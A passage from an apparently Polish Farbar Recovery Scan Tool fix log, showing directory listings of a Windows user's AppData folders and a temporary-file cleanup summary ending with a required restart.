[C:\ProgramData\Microsoft\Windows\Templates] 2014-08-26 23:49 Ulubione [C:\Users\Public\Favorites] 2015-03-25 01:04 WindowsMangerProtect 0 plik(˘w) 0 bajt˘w 25 katalog(˘w) 83˙185˙983˙488 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\Karina\AppData\Local ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\Users\Karina\AppData\Local 2017-06-17 20:07 . 2017-06-17 20:07 .. 2015-07-17 12:18 Adobe 2017-06-17 14:30 Apps 2016-07-12 20:17 CEF 2017-05-15 14:03 CWASRE 2014-08-26 23:49 Dane aplikacji [C:\Users\Karina\AppData\Local] 2017-06-04 21:18 Diagnostics 2017-06-17 19:55 ElevatedDiagnostics 2017-04-03 12:35 EmieSiteList 2017-04-03 12:35 EmieUserList 2017-03-10 21:06 58˙016 GDIPFONTCACHEV1.DAT 2016-12-02 11:53 Google 2015-08-20 06:05 GWX 2014-08-26 23:49 Historia [C:\Users\Karina\AppData\Local\Microsoft\Windows\History] 2017-06-17 17:09 3˙208˙311 IconCache.db 2014-08-27 13:10 Macromedia 2017-06-17 13:54 Microsoft 2014-10-11 14:17 Microsoft Games 2014-08-27 09:11 Mozilla 2014-08-29 12:10 Opera Software 2016-01-06 12:02 PokerStars.EU 2017-04-03 12:35 Programs 2017-06-09 18:18 snare 2014-11-17 22:37 Spotify 2017-06-17 20:04 Temp 2014-08-26 23:49 Temporary Internet Files [C:\Users\Karina\AppData\Local\Microsoft\Windows\Temporary Internet Files] 2014-08-26 23:49 VirtualStore 2017-05-09 16:43 VNASRE 2014-08-27 16:46 WindowsUpdate 2 plik(˘w) 3˙266˙327 bajt˘w 28 katalog(˘w) 83˙185˙983˙488 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\Karina\AppData\LocalLow ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\Users\Karina\AppData\LocalLow 2017-04-25 13:21 . 2017-04-25 13:21 .. 2014-08-28 12:51 EmieSiteList 2014-08-28 12:51 EmieUserList 2014-08-31 22:27 Microsoft 2017-06-17 14:14 Mozilla 2014-10-19 17:22 PlayReady [C:\ProgramData\Microsoft\PlayReady] 0 plik(˘w) 0 bajt˘w 7 katalog(˘w) 83˙185˙983˙488 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\Karina\AppData\Roaming ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\Users\Karina\AppData\Roaming 2017-06-17 20:06 . 2017-06-17 20:06 .. 2014-08-27 13:10 Adobe 2014-08-27 10:29 AVAST Software 2014-08-26 23:49 Identities 2014-08-27 00:05 Intel 2014-08-27 13:10 Macromedia 2009-07-14 20:09 Media Center Programs 2017-05-12 07:55 Microsoft 2014-08-27 09:11 Mozilla 2014-08-29 12:10 Opera Software 2015-12-02 01:46 Spotify 2017-04-14 00:15 SSMgre 2017-03-09 19:41 TeamViewer 2017-02-12 21:13 vlc 2017-05-28 17:28 WinSAPSvc 2017-05-16 23:18 WMM 0 plik(˘w) 0 bajt˘w 17 katalog(˘w) 83˙185˙979˙392 bajt˘w wolnych ========= Koniec CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 123269472 B Java, Flash, Steam htmlcache => 10843 B Windows/system/drivers => 887432003 B Edge => 0 B Chrome => 854611330 B Firefox => 373329363 B Opera => 533665894 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 7936 B Public => 0 B ProgramData => 0 B systemprofile => 72699305 B systemprofile32 => 10877108 B LocalService => 66228 B NetworkService => 434566 B Karina => 2064782485 B Gość => 312371 B RecycleBin => 0 B EmptyTemp: => 4.6 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 20:08:51 ====